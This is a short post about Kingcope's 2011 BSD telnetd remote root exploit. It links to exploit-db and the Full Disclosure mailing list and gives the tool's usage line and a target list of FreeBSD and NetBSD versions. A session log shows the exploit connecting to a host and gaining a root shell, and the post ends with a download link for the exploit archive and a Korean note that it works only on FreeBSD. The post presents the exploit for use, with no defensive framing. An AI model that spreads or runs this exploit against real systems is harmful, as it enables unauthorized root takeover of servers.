BSB telnetd Remote Root pwnerable exploit

http://www.exploit-db.com/exploits/19520/

This exploit was leaked on the Full Disclosure mailing list:

http://seclists.org/fulldisclosure/2012/Jun/404

BSD telnetd Remote Root Exploit *ZERODAY*

By Kingcope

Year 2011

usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]

[-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s

src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name

[port]]

TARGETS:

0 FreeBSD 8.2 i386

1 FreeBSD 8.0/8.1/8.2 i386

2 FreeBSD 7.3/7.4 i386

3 FreeBSD 6.2/6.3/6.4 i386

4 FreeBSD 5.3/5.5 i386

5 FreeBSD 4.9/4.11 i386

6 NetBSD 5.0/5.1 i386

7 NetBSD 4.0 i386

8 FreeBSD 8.2 amd64

9 FreeBSD 8.0/8.1 amd64

10 FreeBSD 7.1/7.3/7.4 amd64

11 FreeBSD 7.1 amd64

12 FreeBSD 7.0 amd64

13 FreeBSD 6.4 amd64

14 FreeBSD 6.3 amd64

15 FreeBSD 6.2 amd64

16 FreeBSD 6.1 amd64

17 TESTING i386

18 TESTING amd64

Trying 192.168.2.8...

Connected to 192.168.2.8.

Escape character is '^]'.

Trying SRA secure login:

*** EXPLOITING REMOTE TELNETD

*** by Kingcope

*** Year 2011

USING TARGET -- FreeBSD 8.2 amd64

SC LEN: 30

ALEX-ALEX

6:36PM  up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09

USER             TTY      FROM              LOGIN@  IDLE WHAT

kcope            pts/0    192.168.2.3       6:32PM     4 _su (csh)

FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17

02:41:51 UTC 2011

root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC  amd64

uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

Exploit:  http://www.exploit-db.com/sploits/19520.zip 익스플로잇 다운 로드

Free BSD 환경에서만 적용